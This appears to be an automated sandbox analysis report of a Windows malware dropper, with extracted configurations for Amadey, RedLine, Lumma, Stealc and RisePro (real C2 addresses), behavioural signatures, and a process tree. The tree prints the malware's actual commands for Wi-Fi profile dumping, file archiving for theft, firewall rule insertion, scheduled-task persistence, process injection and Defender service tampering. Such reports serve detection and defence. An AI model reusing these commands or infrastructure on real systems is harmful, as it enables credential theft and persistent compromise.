Analysis

  • max time kernel
    63s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 16:00

General

  • Target

    64ef13425072d53e16f1facee2df6b97da1c6773f2825cfa78d8a19f58ba6b2b.exe

  • Size

    2.8MB

  • MD5

    b22c392103e7cee41fceeae0f66e8601

  • SHA1

    f062b2f603898b9cf7de9e99bbe37e0a4cfc231f

  • SHA256

    64ef13425072d53e16f1facee2df6b97da1c6773f2825cfa78d8a19f58ba6b2b

  • SHA512

    4fdfebd01365de050c8a497d525e14b4c5469dc040a94b3cf2d4821dc986bc697a498442f8e848d29f9169d6242ba99175bee1dbc6679bffcd87ffcb033125e9

  • SSDEEP

    49152:tk819XmgJZU7RgOjXzd14D1PH5qkRb4VkyGGpz8H:tk2DQgOjXzd16SkRkCzJ

Malware Config

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.93:58709

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.184.225.183:30592

Extracted

Family

stealc

C2

http://52.143.157.84

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 19 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 15 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 13 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 60 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\64ef13425072d53e16f1facee2df6b97da1c6773f2825cfa78d8a19f58ba6b2b.exe
    "C:\Users\Admin\AppData\Local\Temp\64ef13425072d53e16f1facee2df6b97da1c6773f2825cfa78d8a19f58ba6b2b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Users\Admin\AppData\Local\Temp\1000054001\amert.exe
        "C:\Users\Admin\AppData\Local\Temp\1000054001\amert.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4176
      • C:\Users\Admin\AppData\Local\Temp\1000055001\21164f720e.exe
        "C:\Users\Admin\AppData\Local\Temp\1000055001\21164f720e.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
          4⤵
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:468
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff89bd6ab58,0x7ff89bd6ab68,0x7ff89bd6ab78
            5⤵
              PID:3740
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:2
              5⤵
                PID:4936
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:8
                5⤵
                  PID:1804
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:8
                  5⤵
                    PID:1364
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:1
                    5⤵
                      PID:3332
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:1
                      5⤵
                        PID:4112
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4324 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:1
                        5⤵
                          PID:3244
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4444 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:1
                          5⤵
                            PID:1020
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4100 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:8
                            5⤵
                              PID:2020
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3284 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:8
                              5⤵
                              • Modifies registry class
                              PID:2540
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:8
                              5⤵
                                PID:1644
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5112 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:8
                                5⤵
                                  PID:3012
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1944,i,31252649544337406,13695681445001037778,131072 /prefetch:8
                                  5⤵
                                    PID:1972
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                3⤵
                                • Loads dropped DLL
                                PID:1356
                                • C:\Windows\system32\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                  4⤵
                                  • Blocklisted process makes network request
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2208
                                  • C:\Windows\system32\netsh.exe
                                    netsh wlan show profiles
                                    5⤵
                                      PID:2504
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\132431369515_Desktop.zip' -CompressionLevel Optimal
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3180
                                • C:\Users\Admin\AppData\Local\Temp\1000056001\d1e7cce026.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000056001\d1e7cce026.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2836
                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                  3⤵
                                    PID:4384
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                    3⤵
                                    • Blocklisted process makes network request
                                    • Loads dropped DLL
                                    PID:516
                              • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                1⤵
                                  PID:4640
                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                  C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                  1⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3012
                                • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                  C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                  1⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1912
                                  • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5396
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      3⤵
                                        PID:5500
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        3⤵
                                          PID:5508
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 880
                                          3⤵
                                          • Program crash
                                          PID:5600
                                      • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5992
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          3⤵
                                          • Checks computer location settings
                                          PID:6104
                                          • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                                            "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            PID:2212
                                          • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
                                            "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4640
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                            4⤵
                                              PID:5864
                                              • C:\Windows\SysWOW64\choice.exe
                                                choice /C Y /N /D Y /T 3
                                                5⤵
                                                  PID:1416
                                          • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5380
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              3⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5468
                                          • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
                                            2⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            PID:5700
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:6000
                                          • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:6112
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                            2⤵
                                            • Loads dropped DLL
                                            PID:5420
                                            • C:\Windows\system32\rundll32.exe
                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                              3⤵
                                              • Blocklisted process makes network request
                                              • Loads dropped DLL
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5424
                                              • C:\Windows\system32\netsh.exe
                                                netsh wlan show profiles
                                                4⤵
                                                  PID:5740
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\132431369515_Desktop.zip' -CompressionLevel Optimal
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1608
                                            • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:5580
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                3⤵
                                                • Loads dropped DLL
                                                • Checks processor information in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1048
                                            • C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:5188
                                            • C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5524
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                3⤵
                                                • Checks computer location settings
                                                PID:5180
                                                • C:\Users\Admin\Pictures\f17OotSaOMaUYeVxuCN38G5T.exe
                                                  "C:\Users\Admin\Pictures\f17OotSaOMaUYeVxuCN38G5T.exe"
                                                  4⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  PID:5720
                                                  • C:\Users\Admin\AppData\Local\Temp\u4ew.0.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\u4ew.0.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:6244
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 1016
                                                      6⤵
                                                      • Program crash
                                                      PID:5396
                                                  • C:\Users\Admin\AppData\Local\Temp\u4ew.3.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\u4ew.3.exe"
                                                    5⤵
                                                      PID:6656
                                                      • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                        6⤵
                                                          PID:5824
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 1156
                                                        5⤵
                                                        • Program crash
                                                        PID:3692
                                                    • C:\Users\Admin\Pictures\HgfR9Ym9vuMjDmtDdiJuUY1C.exe
                                                      "C:\Users\Admin\Pictures\HgfR9Ym9vuMjDmtDdiJuUY1C.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5172
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        5⤵
                                                          PID:7120
                                                        • C:\Users\Admin\Pictures\HgfR9Ym9vuMjDmtDdiJuUY1C.exe
                                                          "C:\Users\Admin\Pictures\HgfR9Ym9vuMjDmtDdiJuUY1C.exe"
                                                          5⤵
                                                            PID:2848
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              6⤵
                                                                PID:1956
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                6⤵
                                                                  PID:3456
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                    7⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:2728
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  6⤵
                                                                    PID:3952
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -nologo -noprofile
                                                                    6⤵
                                                                      PID:6436
                                                                    • C:\Windows\rss\csrss.exe
                                                                      C:\Windows\rss\csrss.exe
                                                                      6⤵
                                                                        PID:6428
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -nologo -noprofile
                                                                          7⤵
                                                                            PID:6824
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                            7⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:4452
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /delete /tn ScheduledUpdate /f
                                                                            7⤵
                                                                              PID:3976
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -nologo -noprofile
                                                                              7⤵
                                                                                PID:6160
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -nologo -noprofile
                                                                                7⤵
                                                                                  PID:6236
                                                                                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                  7⤵
                                                                                    PID:6988
                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                                    7⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:6048
                                                                                  • C:\Windows\windefender.exe
                                                                                    "C:\Windows\windefender.exe"
                                                                                    7⤵
                                                                                      PID:1720
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                        8⤵
                                                                                          PID:3244
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                            9⤵
                                                                                            • Launches sc.exe
                                                                                            PID:6800
                                                                                • C:\Users\Admin\Pictures\Ilt5ox5SJtYtFpYw2hALqCcj.exe
                                                                                  "C:\Users\Admin\Pictures\Ilt5ox5SJtYtFpYw2hALqCcj.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5708
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -nologo -noprofile
                                                                                    5⤵
                                                                                      PID:2696
                                                                                    • C:\Users\Admin\Pictures\Ilt5ox5SJtYtFpYw2hALqCcj.exe
                                                                                      "C:\Users\Admin\Pictures\Ilt5ox5SJtYtFpYw2hALqCcj.exe"
                                                                                      5⤵
                                                                                        PID:708
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -nologo -noprofile
                                                                                          6⤵
                                                                                            PID:5828
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                                            6⤵
                                                                                              PID:2388
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                7⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:1592
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -nologo -noprofile
                                                                                              6⤵
                                                                                                PID:5192
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -nologo -noprofile
                                                                                                6⤵
                                                                                                  PID:6464
                                                                                            • C:\Users\Admin\Pictures\dIoaxIgpTgH6aaoZMsVvBZCC.exe
                                                                                              "C:\Users\Admin\Pictures\dIoaxIgpTgH6aaoZMsVvBZCC.exe"
                                                                                              4⤵
                                                                                              • Modifies firewall policy service
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
